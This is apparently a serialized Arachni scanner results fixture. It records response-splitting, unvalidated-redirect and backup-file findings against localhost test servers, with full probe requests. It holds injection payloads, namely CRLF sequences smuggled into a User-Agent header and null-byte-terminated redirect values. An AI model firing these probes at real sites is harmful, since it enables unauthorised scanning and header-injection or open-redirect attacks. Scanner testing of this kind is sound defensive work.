bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." 
remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: User-Agent url: http://localhost:10519/header/append elem: header method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: User-Agent :element: header :params: :headers: User-Agent: ! "arachni_user\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :injected: !binary |- YXJhY2huaV91c2VyJTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5 MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDVi OWM1OTolMjBubw== :combo: User-Agent: ! 
"arachni_user\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :action: http://localhost:10519/header/append :regexp: '' var: User-Agent url: http://localhost:10519/header/append injected: arachni_user%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 'arachni_user%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no' Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? !binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." 
remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: User-Agent url: http://localhost:10519/header/straight elem: header method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: User-Agent :element: header :params: :headers: User-Agent: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :injected: !binary |- JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubw== :combo: User-Agent: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :action: http://localhost:10519/header/straight :regexp: '' var: User-Agent url: http://localhost:10519/header/straight injected: ! 
'%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no' Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? !binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards var: input url: http://localhost:7027/form/straight elem: form method: GET name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. 
tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: www.arachni-boogie-woogie.com :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :follow_location: true :injected: !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :combo: !binary "aW5wdXQ=": !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :action: http://localhost:7027/form/straight :regexp: '' var: input url: http://localhost:7027/form/straight injected: !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "TG9jYXRpb24=": !binary |- aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unvalidated redirect description: The web application 
redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: [] internal_modname: UnvalidatedRedirect internal_modname: UnvalidatedRedirect - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards var: input url: http://localhost:7027/form/append elem: form method: GET name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." 
mod_name: Unvalidated redirect variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: www.arachni-boogie-woogie.com :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== :follow_location: true :injected: !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== :action: http://localhost:7027/form/append :regexp: '' var: input url: http://localhost:7027/form/append injected: !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "TG9jYXRpb24=": !binary |- aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! 
"Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: [] internal_modname: UnvalidatedRedirect internal_modname: UnvalidatedRedirect - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards var: input url: http://localhost:7027/link/straight?input=default elem: link method: GET name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: www.arachni-boogie-woogie.com :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :follow_location: true :injected: !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :combo: !binary "aW5wdXQ=": !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :action: http://localhost:7027/link/straight?input=default :regexp: '' var: input url: http://localhost:7027/link/straight?input=default injected: !binary |- d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A id: regexp: '' regexp_match: elem: link remarks: :stuff: - Blah - Blah2 method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- 
U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "TG9jYXRpb24=": !binary |- aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: [] internal_modname: UnvalidatedRedirect internal_modname: UnvalidatedRedirect - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards var: input url: http://localhost:7027/link/append?input=default elem: link method: GET name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." 
mod_name: Unvalidated redirect variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: www.arachni-boogie-woogie.com :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== :follow_location: true :injected: !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== :action: http://localhost:7027/link/append?input=default :regexp: '' var: input url: http://localhost:7027/link/append?input=default injected: !binary |- ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA== id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "TG9jYXRpb24=": !binary |- aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! 
"Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: [] internal_modname: UnvalidatedRedirect internal_modname: UnvalidatedRedirect - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards var: cookie2 url: http://localhost:7027/cookie/append elem: cookie method: GET name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: www.arachni-boogie-woogie.com :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": !binary |- Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :injected: !binary |- Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :combo: !binary "Y29va2llMg==": !binary |- Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :action: http://localhost:7027/cookie/append :regexp: '' var: cookie2 url: http://localhost:7027/cookie/append injected: !binary |- Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: 
cookie2=cookie+valuewww.arachni-boogie-woogie.com%00 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "TG9jYXRpb24=": !binary |- aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: [] internal_modname: UnvalidatedRedirect internal_modname: UnvalidatedRedirect - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards var: User-Agent url: http://localhost:7027/header/append elem: header method: GET name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." 
mod_name: Unvalidated redirect variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: www.arachni-boogie-woogie.com :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: !binary |- YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :injected: !binary |- YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :combo: User-Agent: !binary |- YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A :action: http://localhost:7027/header/append :regexp: '' var: User-Agent url: http://localhost:7027/header/append injected: !binary |- YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: !binary |- YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "TG9jYXRpb24=": !binary |- aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo0MyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unvalidated redirect description: The web application redirects users to unvalidated URLs. 
tags: - unvalidated - redirect - injection - header - location cwe: '819' cwe_url: http://cwe.mitre.org/data/definitions/819.html severity: Medium remedy_guidance: ! "Server side verification should be employed\n to ensure that the redirect destination is the one intended." mod_name: Unvalidated redirect variations: [] internal_modname: UnvalidatedRedirect internal_modname: UnvalidatedRedirect - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.old elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.old injected: some_filename.old id: some_filename.old elem: path remarks: {} method: '' response: some_filename.old headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.bak elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.bak injected: some_filename.bak id: some_filename.bak elem: path remarks: {} method: '' response: some_filename.bak headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - 